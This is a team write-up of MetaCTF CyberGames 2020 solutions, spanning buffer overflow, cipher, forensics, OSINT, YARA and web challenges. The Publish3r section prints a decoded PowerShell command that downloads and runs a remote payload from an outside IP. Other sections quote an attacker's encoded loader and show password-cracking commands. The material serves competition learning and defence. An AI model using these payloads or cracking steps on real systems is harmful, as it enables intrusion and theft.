MetaCTF CyberGames 2020 Writeup — Last Minute Team Name

Wyatt Tauber

Nov 2, 2020·28 min read

This post is a collaborative effort between myself, Connor C., Tim E., and Tilden W. Together, we represented Northeastern University, the University of Cincinnati, the Rochester Institute of Technology, and the University of Virginia. Thanks for a great time, guys!

MetaCTF is an annual cybersecurity Capture The Flag (CTF) event, hosted online this year due to the COVID-19 pandemic. Teams of four from across the world, composed of students and non-students alike, competed in the event for a total prize pool of $5000. The 24-hour event began on October 24 at noon EST. In total, 1,587 teams registered for the event, and 995 teams were able to score points.

Our team was Last Minute Team Name, affiliated with the fictitious Zoom University. By the end of the challenge, we were able to earn a total of 6,750 points. Our score placed us in 36th overall, 24th among the student teams, and in the top 4% of scored teams.

Challenges and Kickoff

This year's challenges included binary exploitation, cryptography, forensics, reconnaissance, reverse engineering, multimedia, and web exploitation. We were required to perform and apply various techniques to find buffer overflows, discover data exfiltration in network traffic, gather open-source intelligence (OSINT), brute-force passwords, analyze and detect malware, and reverse engineer audio files. There were also various trivia competitions and bonus flags release throughout the day.

This report covers the challenges we were able to submit before the competition closed. We listed the challenges per section in the order of the points they were worth. The more points awarded for a challenge, the more difficult it was to solve.

Our Strategy

Due to its remote nature, my team used a Discord server to communicate during the competition. We used one channel per challenge and organized them per category, from lowest to highest point values. We also used emojis to indicate whether we solved a challenge (✅), had attempted it but not for more than an hour (❔), or had tried it for more than an hour without any progress (❓).

In each channel, we posted the progress we had made and any details we had discovered. Doing so allowed us to rotate between challenges and quickly pick up where another team member had left off without frequently questioning them. If there was a problem that we could not solve for more than an hour, we marked it and moved on, allowing another team member to attempt it later. Some of the most difficult challenges required input from all four of us before solving the challenge.

Binary Exploitation

The addresses and ports in this section are in Netcat syntax. Use the nc command to connect to each challenge.

Baffling Buffer 0

150 points/solved by 580 teams

While hunting for vulnerabilities in client infrastructure, you discover a strange service located at host1.metaproblems.com 5150. You’ve uncovered the binary and source code of the remote service, which looks somewhat unfinished. The code is written in a very exploitable manner. Can you find out how to make the program give you the flag?

The provided code is written in C.

#include <stdio.h>
#include <stdlib.h>

void vuln() {
	int isAuthenticated = 0;
	char buf[48];
	puts("Enter the access code: ");
	gets(buf);
	puts("TODO: Implement access code checking.");
	if(isAuthenticated) {
		system("/bin/cat flag.txt");
	}
	else {
		puts("Invalid auth!");
	}
}

int main() {
	setbuf(stdout, 0);
	setbuf(stdin, 0);
	setbuf(stderr, 0);
	vuln();
	return 0;
}

Notably, it uses the unsafe function gets() with a fixed buffer length of 48 bytes. We should perform a simple buffer overflow by inputting too many characters.

The flag is MetaCTF{just_a_little_auth_bypass}.

Cryptography

Crypto Stands For Cryptography

100 points/solved by 932 teams

Welcome to the crypto team! We help consult in a variety of areas around the security department, helping to make sure our company is using proper encryption, data storage, and data transfer mechanisms.

The data security team said they currently use something called Base64 to “encrypt” data. They want to know if that’s a secure way to store sensitive data, and provided a sample of data:

TWV0YUNURntiYXNlNjRfZW5jMGRpbmdfaXNfbjB0X3RoZV9zYW1lX2FzX2VuY3J5cHRpMG4hfQ==

Is it secure? Can you crack it?

CyberChef can be used to convert the Base64 to plaintext:

The flag is MetaCTF{base64_enc0ding_is_n0t_the_same_as_encrypti0n!}.

ROT 26

150 points/solved by 707 teams

We’ve applied some encoding to obfuscate our messages. There’s no way you can figure out the original message now?! I applied the unbreakable ROT 26 algorithm:

g!0{]n`7*+0y~+1|(!y.+0yKM9

Dcode is a great website to crack many different types of codes. Here, it was used to brute-force the “ROT 26” ciphertext.

The flag is MetaCTF{not_double_rot_13}.

Welcome to the Obfuscation Games!

175 points/solved by 600 teams

During a recent incident response investigation, we came across this suspicious command executed by an attacker, and we’d like you to analyze it. Malware authors like to obfuscate their payloads to make it harder, but we’re sure you’re up to the task. See if you can figure out what’s happening without even running it!

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“H4sIAEFgjl8A/xXMMQrCQBCF4as8FltPIFaCnV3A8jFmn8ngupuYaUS8e5LyL77//vHQcWxLIHWj8Cw2wBd4RWyp2resjMm+pVlOJxzmGWekm8Iu3fU3ScXrwIf1L26C+4CtijukBY3hb/3TCj2Ieh9qAAAA”));IEX (New-Object IO.StreamReader(New-ObjectIO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

We know that the GzipStream function is used to compress and decompress data in the GZip format. For this challenge, we can use a simple online tool to convert the Base64 string in the function to a .gz file.

Download and unzip the .gz file with any compatible extraction software, and inside is a text file which contains the flag MetaCTF{peeling_back_the_flag_one_code_at_a_time} .

The Last Great ZIP File

200 points/solved by 472 teams

Help! I’ve created a zip archive that contains my favorite flag, but I forgot the password to it. Can you help me recover my flag back?

You may need to use another program, such as wget to download the file if your browser is blocking the download. Now to get the password hash from the zip file…

Use fcrackzip and the rockyou.txt file (included on Kali) to crack the password of this .zip file.

sudo apt-get install fcrackzip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt flag.zip

Now use the password to get the flag:

An image file is extracted:

The flag is MetaCTF{crack_the_planet}.

Board Meeting Gone Wrong

325 points/solved by 70 teams

I stole this sensitive document that contains some really important board notes. I have a feeling I can get some serious insight on stonks here.

There are a few things I know about the person I stole it from. He likes animals, he likes to speak like he’s a hacker to make himself seem cool, and he was born in 1972. I hope that helps.

Can you help me crack it? I will make sure to share some of the profits.

First, get the hash of the document using Office2John:

python office2john.py Board_Meeting_Notes.docx

Now, create the wordlist to use with Hashcat. Based on the hint, we believe that the password:

• Contains an animal name in in leet
• Contains the contiguous string “1972”, probably at the start or end
• May have the first letter capitalized

We found a large list of animal names on GitHub (animals.txt) and translated them into leet with WordListGen, creating an animals-leet.txt file.

Then we copied and prepended 1972 to the start of each word in animals-1337.txt, creating animals-1337-start.txt, and appended 1972 to another copy of the file, creating animals-1337-end.txt. We also created a version of each file in which each line started with a lowercase letter (the animal list from GitHub used uppercase animal names). All of these actions can be done with the Linux built-in awk or sed commands.

Merging the files gives us the dictionary to use for cracking the password:

!!@m@1972
!08$+3r1972
!0ng-3@r3d 0w!1972
!1++!3 P3ngu1n1972
!10n1972
!10nf1$h1972
!12@rd1972
!1g3r1972
!30p@rd1972
…

Using our dictionary with Hashcat gives us the password: d0lph1n1972

Opening the file gives the flag: MetaCTF{not_all_meetings_are_secret} .

Forensics

I did most of these forensics challenges on SIFT Workstation.

Forensics 101

100 points/solved by 839 teams

Sometimes in forensics we run into files that have odd or unknown file extensions.

In these cases it’s helpful to look at some of the file format signatures to figure out what they are. We use something called “magic bytes” which are the first few bytes of a file.

What is the ASCII representation of the magic bytes for a RAR archive?

“Magic bytes” is another term for a file signature, the sequence of bytes at the beginning of a file that is used by an operating system to determine the appropriate application to open it. File signatures are primarily used in Linux since Windows prefers to use the file extension, a three-character string affixed to the end of a filename. However, some Windows programs and web applications may also use the file signature.

File signatures are generally seen as the more secure method for determining the applications that can open a file because they are less easily editable than extensions. They are also useful for steganography and file carving. If an analyst suspects that a file is hiding inside another, and as long as neither file is encrypted or encoded, many forensics programs can identify the hidden file and extract it based on the occurrence of nonmatching file signatures inside of the host file.

Wikipedia keeps a list of file signatures. According to the list, a RAR archive’s file signature should be Rar!…. This is the flag.

Staging in 1…2…3

150 points/solved by 737 teams

The Incident Response (IR) team identified evidence that a Threat Actor accessed a system that contains sensitive company information. The Chief Information Security Officer (CISO) wants to know if any data was accessed or taken.

There was a suspicious file created during the timeframe of Threat Actor activity:

C:\123.tmp. Can you check it out?

If you were to download the provided file, it would appear like this in Windows:

Since Windows uses the file extension instead of the signature as previously discussed, the OS believes that this is a Windows temporary file. However, we know better. Open the file on Linux.

UNIX-based operating systems will properly read the file type (an archive file) based on the signature. However, let’s run the UNIX file command on it to be sure.

More specifically, this is a RAR archive file, the same file format we just analyzed. It can be extracted via the GUI, but I prefer the terminal.

Now that the correct file type was identified and the contents have been extracted, the flag is clearly visible:

MetaCTF{definitely_n0t_all_0f_y0ur_sensitive_data}

To do this in Windows, change the file extension to .rar. You may need a 3rd party application like 7-Zip or WinRAR to extract it.

Publish3r

225 points/solved by 430 teams

We believe we found a malicious file on someone’s workstation. Judging by looking at it, the file likely came from a phishing email. Anyways, we’d like you to analyze the sample, so we can see what would have happened if it executed successfully. That way we can hunt for signs of it across the enterprise. Your flag will be the URL that the malware is trying to reach out to! Can you do it? Format: MetaCTF{http://.........}

Note: We’ve put the actual file in an encrypted 7z so your browser doesn’t complain when downloading it (and our site doesn’t get flagged as malware). The password is

metactf

Once again, the file is compressed, this time with 7-Zip. Extract it.

7z x Publish3r.7z

This time, the file extension does match the magic bytes. It is a Microsoft Publisher document.

As this is an easier forensics challenge, starting with basic static analysis would make sense. Try running strings on the file.

strings Publish3r.7z > strings.txt

Open the strings.txt file to look for any suspicious data. Among the many strange things in this Publisher document, it most certainly should not be invoking Windows PowerShell. This PowerShell command is encoded, though… I’ll use CyberChef’s Magic function to figure out what it is.

Ah! Base64. Now use CyberChef’s Base64 decoder.

The decoded command is:

IEx ((nEW-OBJeCt net.webclient).downloadstring(("http://13.37.10.10:4443/doc/payload.ps1")))

Therefore, the flag is MetaCTF{http://13.37.10.10:4443/doc/payload.ps1}.

Open Thermal Exhaust Port

275 points/solved by 416 teams

Our TCP connect Nmap scan found some open ports it seems. We may only have a pcap of the traffic, but I’m sure that won’t be a problem! Can you tell us which ones they are?

The flag will be the sum of the open ports. For example, if ports 25 and 110 were open, the answer would be MetaCTF{135}.

This challenge presents a packet capture (.pcap file) that can be analyzed with Wireshark. There are two IP addresses — 10.0.2.6 and 10.0.2.15. Nmap is a port scanner, so if you know about the TCP Three-Way Handshake, you will know that the client that is sending packets with SYN (synchronize) flags is the one that is scanning with Nmap, and the one frequently sending RST, ACK (reset, acknowledge) flags is the target.

Based on this information, 10.0.2.15 is clearly the attacker, and 10.0.2.6 is clearly the target. The target will send the RST, ACK flag pattern when the destination port is closed and SYN, ACK when the port is open, which is how Nmap identifies open ports (barring there is no firewall or IPS in the middle of the connection).

Now, we need to look for the ports returning SYN, ACK from the target. By applying a display filter for 10.0.2.6 as a source and packets that have the SYN and ACK bits set in the TCP flags (ip.src == 10.0.2.6 and tcp.flags == 0x12), the results are narrowed down significantly.

The port on the left in the info field is the source port, and the port on the right is the destination field. We are focusing on the source port because the traffic we are interested in originates from the target (set as the display filter). Now, ignoring duplicates, we can add up the seven open port numbers to get the flag.

80 (HTTP) + 443 (HTTPS) + 23 (Telnet) + 21 (FTP) + 53 (DNS) + 22 (SSH) + 3128 (Squid Proxy) = 3770MetaCTF{3770}

I was hoping for 1337, but that might’ve been too obvious of a flag.

Mystery C2

325 points/solved by 157 teams

Our threat intel team detected some malicious Command-and-Control traffic in our network. Can you identify what C2 framework the threat actor is using?

You only have 5 attempts for this one.

This challenge includes another .pcap file. Upload it to PacketTotal to get a high-level picture of what the malware is doing.

The malware sent many packets from 10.0.2.15 (an RFC 1918 private address) to 8.8.4.4, Google’s alternate DNS server, over port 443 (HTTPS). Are there any C2 servers that use DNS over HTTPS and can use Google’s DNS server?

Yes, there is: a quick search reveals that this C2 is most likely goDoH.

Just in Time

375 points/solved by 20 teams (we were the first team to solve!)

Time is running out, and we need your help! Our team has managed to recover a hard drive from a suspect’s computer, and we think there may be information pertaining to the location of an upcoming meet. Unfortunately, the user almost certainly uses an encrypted messaging program when communicating sensitive info.

We’re hoping to recover the address of the meet, which is the flag. Please enter just the street number and road, for example,

123 Easy Street. Also, to make the file download more manageable, we’re giving you just the Users folder with some large (and irrelevant files) deleted. You can download the Users folder here.

Even though the message was purportedly encrypted, there is still the possibility that the operating system or program cached it before it was sent. If the cache hasn’t yet been cleared, it should be possible to recover the message if you know where to look. There are a few locations where the message might still be available:

• The operating system, because it handles all keyboard input
• The web browser, if the encrypted chat application is web-based
• A client application for the chat service that was used to send the message

I will use FTK Imager for this challenge because it provides a simple method for organizing system files and applying forensic techniques.

There is only one user present on the system (excluding the default accounts), Xiang Zhi. Starting with the operating system, browse to C:\Users\Xiang Zhi\AppData\Local\Microsoft\InputPersonalization\TextHarvester\. This folder would store TextHarvester.dat, a file that adapts to the user's language model and dictionary if Input Personalization is enabled (and contains sensitive keystrokes on occasion). Unfortunately, the folder is empty, so this feature must not be enabled.

Moving on to the browser, C:\Users\Xiang Zhi\AppData\Local\Google shows that Google Chrome is installed. Let’s use Hindsight to learn about Zhi’s web browsing activities.

They downloaded Wire-Setup.exe, which is the installer for the Wire encrypted messaging app. Unfortunately, there are no credentials, nor is there an address. We will have to inspect the application data itself.

If we continue looking around in the C:\Users\Xiang Zhi\AppData folder, we find a Wire folder under C:\Users\Xiang Zhi\AppData\Roaming. What files or folders have been edited recently?

There is a database folder a few layers down that has an edit date of September 13th at around 10:00 PM EST. What’s in there?

Check out the log file for anything interesting. We find an address by searching the file for the word “meet,” as the challenge suggests.

Therefore, the flag is MetaCTF{933 English Muffin Way}.

Multimedia

Watermarked

250 points/solved by 146 teams

Sonic watermarks are a security measure used by many different actors in the audio recording industry. Audio engineers sometimes mix them into unfinished tracks in case they are leaked outside of the studio, and developers of VST plugins often manipulate the generated sound to limit those using free trial or cracked versions of their software.

You are an audio engineer working with famous post-lingual rapper Playball Carl, and you’ve been alerted to a leak that just surfaced on SoundCloud. Recover the watermark to find the identity of the leaker.

Studio Version vs. Leaked Version

Actual track ID: wido — 1292Forex

This challenge requires a basic understanding of audio engineering. The player is given two seemingly identical FLAC files — same length and same looking spectrograph, but one of them contains an inaudible watermark. The spectral analysis doesn’t return any useful information, so we should try to determine if the watermark is hidden in the audio somehow.

We know that if you play two identical audio tracks simultaneously with one track inverted, the noise will cancel out. Let’s use this technique to see if we can determine any differences between the tracks. To do this, import both audio tracks into the same project on Audacity, select one of the tracks and apply Effect > Invert to it, and then play:

When we hit play, we don’t hear any music but instead what sounds like a text-to-speech program reading off each character in the flag, which comes out to the following:

MetaCTF{p4r7ing_7h3_w4v3z}

Reconnaissance

Big Breaches

150 points/solved by 718 teams

How many unique emails were exposed in the biggest single collection of breached usernames/passwords? Provide the answer (flag) in the format MetaCTF{###,###}.

The biggest single collection of breached usernames and passwords available online is almost certainly Collection #1 from 2019. From a quick search, it contains 772,904,991 usernames and passwords. The flag is MetaCTF{772,904,991}.

Not So Itsy Bitsy Spider

200 points/solved by 710 teams

Recent reporting indicates that a prominent ransomware operator, known as WIZARD SPIDER, was able to deploy Ryuk ransomware in an environment within 5 hours of compromise.

What recent, critical vulnerability was exploited in this environment to gain elevated privileges?

The flag will be in the following format:

CVE-XXXX-XXXX

Since the challenge asks for a “recent” and “critical” vulnerability that is exploited by Ryuk, try searching online for “Ryuk CVE 2020” and checking if any critical vulnerabilities appear in the results.

The first result mentions CVE-2020–1472, also known as Zerologon. It is a privilege escalation vulnerability in Windows’ Netlogon service. Does NIST (the maintainer of the National Vulnerability Database, which assigns CVEs severity scores) rate this CVE as critical?

Yes, they do. The flag is CVE-2020–1472.

Diving into the announcement

225 points/solved by 499 teams

Vulnerabilities are patched in software all the time, and for the most serious ones, researchers work to build proof-of-concept(POC) exploits for them. As defenders, we need to continuously monitor when new public exploits drop, figure out how they work, and ensure we’re protected against them. Recently, Microsoft announced CVE-2020–1472. Your task is to locate a public exploit for it and identify the vulnerable function that the POCs call. The flag will be the function’s name.

A great place to find POCs for various exploits is on GitHub. Start by searching for the CVE there. This repo that contains a POC Python script looks like a good one. Since CVE-2020–1472 is the Netlogon Escalation of Privilege vulnerability, any function calls in the repo should start with nrpc (for Netlogon Remote Protocol). Helpfully, there is a function in the Python script called exploit() that calls NetrServerPasswordSet2(). As it is the only function called in exploit(), this ended up being the flag.

Finding Mr. Casyn

275 points/solved by 307 teams

This is the first of three challenges related to the Casyn persona.

We’re looking for a Mr. Casyn, who has been reported missing. We believe he lives in the Chicagoland area, but don’t think he’s in Illinois proper. We need your help finding him and identifying the right Mr. Casyn will help us begin our search.

The flag for this challenge is the first name of Mr. Casyn. There are three attempts available for this challenge.

Note: Mr. Casyn is a fake persona that we have created to help you practice your OSINT skills.

To begin this challenge, let’s gather what we know about our persona:

1. Last name: Casyn
2. Lives in: Chicagoland area
3. Lives in: not Illinois

First, let’s search for a Mr. Casyn and see what comes up:

The top results do not point towards an obvious answer, and with 128,000 results, it would be infeasible to look for him manually. Instead, let’s narrow down our search. We know the general area where he lives: Chicagoland outside of Illinois. According to Wikipedia, the Chicagoland area is comprised of the following cities:

We see three cities outside of Illinois: Kenosha, Wisconsin, Hammond, Indiana, and Gary, Indiana. Let’s try attaching these cities to Casyn’s name in our search. The results for searching “casyn hammond” are below:

Sure enough, we found the Facebook profile of a Vedder Casyn, who turned out to be the target. Unfortunately, the Facebook profile was taken down shortly after the challenge started (we’re unsure why), but we were able to use that name to discover his Twitter profile:

Now we have his name and his website: veddercasyn.me.

Complete Transparency

325 points/solved by 206 teams

At ICMP Industries, we recently created a new subdomain off of our company website. Since our new super secret project is still in development, we chose a long subdomain so no one will know to visit it yet. We also went ahead and upgraded the site to use HTTPS to be more secure.

The flag is the name of our secret subdomain. Note there are dashes between words instead of underscores since it’s a domain name.

Let’s try visiting https://icmpindustries.com/.

The company may not be hosting anything on the main site. However, they do say they added HTTPS to the subdomain for extra security. This means that a certificate had to be issued to the subdomain. Try using a tool such as Censys to find the certificate.

The flag is a-transparent-but-not-invisible-flag.icmpindustries.com.

Ring Ring

325 points/solved by 221 teams

This is the second of three challenges related to the Casyn persona.

We want to try and reach out to Mr. Casyn via telephone. Can you figure out his phone number?

Flag format: XXX-XXX-XXXX. Example: 123–456–7890

Here’s the information we currently know about Mr. Casyn:

1. Full name: Vedder Casyn
2. Lives in: Hammond, IN
3. Facebook profile: https://www.facebook.com/vedder.casyn.5
4. Linkedin profile: https://www.linkedin.com/in/vedder-casyn/
5. Twitter profile: https://twitter.com/veddercasyn/with_replies
6. Github profile: https://github.com/veddercasyn/
7. Website: https://veddercasyn.me/

We’re looking for his phone number, but unfortunately, it doesn’t appear on any of the accounts above. The cached content of his profiles and websites does not reveal anything, either. However, it is possible that Vedder had more information on his website in the past that he decided to remove. In that case, the only place left to look is the version history of the webpage on Github. Going to https://veddercasyn.github.io/index.md and looking at the commit history gives us a list of a few dozen commits — a lot, but nothing that we can’t look through manually. Fortunately, each one is relatively small. Looking at commit 9257913276447d19f8e08d91ebce83743ff11063, we see the following change:

And there’s his phone number: 929–249–4018 .

Hangout Spots

525 points/solved by 127 teams

This is the third of three challenges related to the Casyn persona.

There was no reply from Mr. Casyn’s phone. Can you find out where he likes to frequently hang out so we can look for clues of where he’s been recently? Once you find the image, think of how we can use what we know to geolocate the image based on what’s in the picture.

Flag format is street name, city, state abbreviation zip code. Example: 301 Park Ave, New York, NY 10022

Side note: enjoying the OSINT? Check out https://www.tracelabs.org/ for ways that you can put those skills to use!

Now we have his phone number, but we need to find his exact location. The problem asks to find a common hangout spot, but his website only has this:

He says he doesn’t go here often and the address of this building (discovered through reverse image search) wasn’t the answer. Remembering what we did in the Ring Ring challenge, let’s go back to his GitHub version history and see if we can uncover anything.

At one point, Mr. Casyn revealed his hangout spot. The removed Imgur link above contains the following image:

Now we must discover the location of this building. Looking at the image's left-hand side, we can faintly see a google watermark, meaning it’s most likely a screenshot from Google Maps’ street view. Unfortunately, this means there’s no EXIF data in the image. Something is visible in the upper left window, but we can’t make out what it is. Instead, we’ll have to use landmarks in the image to discover the location.

Behind the building, we can see a large radio tower with several radome antennas on it. Anyone into amateur radio will know that all structures like this in the United States must be registered with the FCC.

Fortunately, the FCC keeps a public database of all registered antenna structures along with their exact locations.

Let’s try an advanced search and put in Hammond, IN, but only for towers that are constructed:

We obtained 18 results, a number reasonable enough to look through manually:

We can take the coordinates of each site and put them into Google Maps. Now let’s look at the antenna tower registered to the Hammond Police Department, the sixth result in the list, from the coordinates listed. Go into the street view for a better look at the tower.

That certainly looks similar to the tower in the image removed from Mr. Casyn’s website. Since we know what the building roof in the original image looks like, let’s look around for it in the satellite view.

The Hammond Public Library, across the street from the police station, looks sort of like the one in our original picture: similar roof, similar parking lot, similar trees. Let’s go down to the street view and see if it matches.

We have a match! Going into street view on State Street right outside the Hammond Public Library gives us the image that Mr. Casyn previously published on his website. Finally, we know his hangout spot.

The flag is the address of the library: 564 State St, Hammond, IN 46320.

Side note: Yes, I am enjoying the OSINT! In fact, I participated in my first Trace Labs Search Party just last week at conINT!

Reverse Engineering

[REDACTED]

225 points/solved by 509 teams

The CEO of Cyber Corp has strangely disappeared over the weekend. After looking more into his disappearance. Local Police Department thinks he might have gotten caught up into some illicit activities.

The IT Department just conducted a search through his company-provided laptop and found an old memo containing a OneTime Password to log into his e-mail. However it seems as if someone has redacted the code, can you recover it for us?

The given PDF is a scan of a paper document with a censor bar placed on top of the document, probably with some software. This means that the scanned document itself is one whole object in the PDF file and the censor bar is another object. First, let’s see what the PDF file looks like:

We will use peepdf to analyze the objects in the PDF:

It looks like Object 5 is the largest one, so it’s probably safe to assume that it contains the original scanned document. Let’s extract it into a jpg file using rawstream:

PPDF> rawstream 5 > docoutput.jpg

We can now see the original PDF:

The flag is MetaCTF{politics_are_for_puppets}.

Precision Matching

375 points/solved by 16 teams

YARA describes itself as a pattern matching swiss knife for malware researchers. I like to think of it though as a precision strike weapon (without the explosion part of course) for seeking out malware based on a configurable, very specific set of characteristics. In addition, it’s quite helpful for identifying related samples built by the same malware author. We recently uncovered a malware author using

a) dynamic imports for their calls to CreateRemoteThread, and

b) Visual Studio 2019.

Here’s the one sample we’ve managed to recover so far. We’d like you to visit our YARA Rule Making Studio and craft a rule to match only these characteristics — no false positives!

About Yara

Yara, created by VirusTotal, is a signature-based method for detecting malware (and many other things). Looking at the documentation for writing Yara rules is helpful for this challenge. The challenge creator has helpfully provided us with a website to check our solution.

We are given an empty Yara rule to start with:

rule yarp {
    condition:
        false
}

This doesn’t detect any of the files as infected.

Matching on Strings

The first signature we need to match on for this rule is the dynamic import for calls to CreateRemoteThread. Define a new string variable with the value CreateRemoteThread. When a string is defined, it must be added to the rule's conditional statement, which tells Yara how to use it.

Currently, our rule looks like this:

rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        false
}

Hmmm… this rule matches all of the samples.

Limiting scope

We can assume by the result that each file the site is matching to the Yara rule imports CreateRemoteThread. However, by examining the provided binary, it looks like the dynamic calls to CreateRemoteThread only appear at the start of the file, up to 0x0002CC50. Yara allows us to only search up to a certain hex value by using the in operator. Set the rule to search from the beginning of the file (0x1) up to 0x0002CC50.

rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt in (0x1..0x0002CC50)
}

We are getting closer!

Avoiding false positives

However, it’s not enough to avoid false positives, so let’s add the second condition: the malware was created using Visual Studio 2019. Since we are analyzing .exe (portable executable (PE) files), we know that each file contains a header with metadata, including information about the tools used to create it. According to Microsoft’s documentation, this field is the minor linker version. Yara can detect this through its PE module’s linker_version object. Since we need to match Visual Studio 2019, set another condition for the pe.linker_version object to be greater than 20 (Visual Studio version numbers are usually the year they were released + 1). The PE Yara module needs to be imported for this to work.

import "pe"rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt in (0x1..0x0002CC50)
        pe.linker_version.minor > 20
}

Does the rule pass?

Yes! The flag is MetaCTF{wielding_the_mighty_power_of_yara_to_stop_the_hackers}.

Web Exploitation

High Security Fan Page

125 points/solved by 832 teams

Uh oh, I woke up to hear that some Swifties seem to have sabotaged my Katy Perry fan page! After writing about why KP is clearly the better artist, I believe they hacked into the system and somehow changed my password! I need to publish a big story today before TMZ steals my scoop, however I can’t find my way back into the admin panel. Can you please help me out by finding my password so I can get back to work?

Note: Obviously most sites aren’t built like this, but it’s good to get familiar examining a website’s source code looks, how resources get loaded in, etc :)

Click here to visit the site

By checking out the source code through the developer console, we can see a framework.js script loaded. This script contains the function authenticate():

function authenticate(){
    var username = document.getElementById("inputUsername").value;
    var password = document.getElementById("inputPassword").value;
    var notFailed = true;
    if(username!="ChrisM"){
        alert("You did not enter the correct username!");
        notFailed = false;
    }
    if(password!="MetaCTF{So_You_Wanna_Play_With_Magic}"){
        alert("You did not enter the correct password!");
        notFailed = false;
    }
    if(notFailed){
        alert("Hiya!");
        window.location.pathname = './a3263ca2855a26f06bd679ac3e240af9/adminpanel.html';
    }
}

Client-side authentication is very unsafe because it allows an attacker to view and manipulate the login process. The flag is MetaCTF{So_You_Wanna_Play_With_Magic}.

Barry’s Web Application

150 points/solved by 781 teams

I’ve made this cool new web application that I plan to use to host a blog. Please check it out at

http://host1.metaproblems.com:5620/

Right now it’s still currently being built, but I hope you enjoy what’s there so far!

Browsing to the provided address gives us the webpage.

To access the documents, we might try spidering the webpage to see what other directories are available. An easy way to do this is with ZAP’s spider.

By default, ZAP won’t try to spider above the lowest directory indicated in the URL field, so set it to http://host1.metaproblems.com:5620/dev/.

It isn’t even necessary to spider because directory browsing is enabled, and the documents directory already shows up in the results. Directory listing may reveal hidden scripts, include files, backup source files, and other files that can be accessed to read sensitive information, which is why this feature should always be disabled.

Browse to /docs to find the hidden files.

The flag is MetaCTF{Dont_l3t_y0ur_d1rect0ries_b3_l1st3d}.

Everyone Loves a Good Cookie

175 points/solved by 615 teams

Cookies are used by websites to keep track of user sessions and help with authentication. Can you spot the issue with this site and convince it that you’re authenticated?

The website asks for a secret code to log in.

It sets a cm-authenticated cookie with the value 0 when an incorrect secret code is entered.

We can manipulate this cookie using BurpSuite. First, make sure that your browser is configured to use BurpSuite’s proxy. Then, on the Proxy tab, turn on Intercept and browse to the challenge site in your browser.

The raw request is seen in BurpSuite.

Right-click anywhere in the request and select “Send to Repeater.” This will allow us to manipulate the cookie value. The Repeater tab should light up. In the Params tab, double-click the value of the cookie to edit it. Set the value to 1. Also, remove the password field using the button on the right so that the cookie isn’t set back to 0 when the request is submitted.

Now click the “Send” button.

The raw response is displayed on the right. The flag is MetaCTF{oscar_says_i_love_trash_and_cookies}.

Bonus Flags

CyberGames 2020 Design Bonus

75 points

There was a bonus flag hidden in this year’s CyberGames logo.

• The octal on the bottom left decodes to welcome_to_the_.
• The hex on the top left decodes to CyberGames_shall_we_.
• The Morse code around the inner circle decodes to play_a_.
• The binary on the right decodes to game?.

The bonus flag is MetaCTF{welcome_to_the_CyberGames_shall_we_play_a_game?}

In Conclusion

With 6,750 points, our score placed us in 36th overall and 24th among the student teams. This qualified us for swag bags and t-shirts (top 30 teams in each category) — my first time receiving a prize for a CTF!

It was cool to see how far my teammates and I have come in developing our skills and solving CTF challenges. I spent most of my time with the forensics challenges and solved all but two of them, which I definitely wouldn't have been able to do a few years ago. However, I also learned that I don’t have much packet capture analysis experience, which I plan to work on.

Finally, thank you to all the MetaCTF organizers for their time and effort put into this competition. I am looking forward to MetaCTF’s 2021 Cyber Games (maybe even in person again)!